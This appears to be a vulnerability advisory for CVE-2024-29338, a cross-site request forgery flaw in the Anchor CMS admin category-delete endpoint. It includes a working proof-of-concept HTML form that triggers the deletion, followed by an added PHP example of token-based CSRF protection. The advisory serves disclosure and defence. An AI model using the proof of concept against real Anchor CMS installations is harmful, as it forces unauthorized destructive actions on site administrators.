Cross-Site Request Forgery (CSRF) Affecting anchorcms/anchor-cms package, versions >=0.0.0
Snyk CVSS
- Attack Complexity: Low
- User Interaction: Required
- Scope: Changed
Threat Intelligence
- Exploit Maturity: Proof of concept
- EPSS: 0.04% (9th percentile)
- Snyk ID SNYK-PHP-ANCHORCMSANCHORCMS-6483245
- published 24 Mar 2024
- disclosed 22 Mar 2024
- credit PWwwww123
Introduced: 22 Mar 2024
CVE-2024-29338
How to fix?
There is no fixed version for anchorcms/anchor-cms.
Overview
anchorcms/anchor-cms is a lightweight blog CMS for PHP.
Affected versions of this package are vulnerable to Cross-Site Request Forgery (CSRF) via the /anchor/admin/categories/delete/2 endpoint. An attacker can perform unauthorized actions on behalf of a legitimate user by tricking the user into clicking a malicious link or visiting a crafted webpage.
PoC
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/anchor/admin/categories/delete/2">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
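The PoC above works because the delete action accepts a plain GET request with no anti-CSRF token. The following is an added example, not Anchor CMS code, of the server-side guard that defeats it: a per-session synchronizer token verified in constant time, the action restricted to POST, and the Sec-Fetch-Site header checked as defence in depth. It assumes PHP sessions are in use; the function names are hypothetical.

```php
<?php
// Added example, not Anchor CMS code: a synchronizer-token CSRF guard for a
// state-changing admin action. Assumes PHP sessions; function names are hypothetical.
declare(strict_types=1);

session_start();

/** Per-session CSRF token, created on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/**
 * Abort any state-changing request that is not a POST carrying the session's
 * token. A bare GET link like /anchor/admin/categories/delete/2 fails here.
 */
function require_csrf_protected_post(): void
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit('State-changing actions must use POST');
    }
    $submitted = $_POST['csrf_token'] ?? '';
    // hash_equals() is constant-time; the is_string check rejects array input
    if (!is_string($submitted) || !hash_equals(csrf_token(), $submitted)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // Defence in depth: modern browsers mark cross-site form posts in Sec-Fetch-Site;
    // older browsers omit the header, so the token above remains the primary control
    $fetchSite = $_SERVER['HTTP_SEC_FETCH_SITE'] ?? 'same-origin';
    if (!in_array($fetchSite, ['same-origin', 'none'], true)) {
        http_response_code(403);
        exit('Cross-site request refused');
    }
}

/** Delete form for the admin UI with the token embedded as a hidden field. */
function delete_category_form(int $id): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="/anchor/admin/categories/delete/' . $id . '">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<button type="submit">Delete category</button></form>';
}
```

The delete handler calls require_csrf_protected_post() before touching the database; with this in place the attacker's page cannot read the victim's token, so the forged request is rejected with 403 (or 405 if it is still a GET).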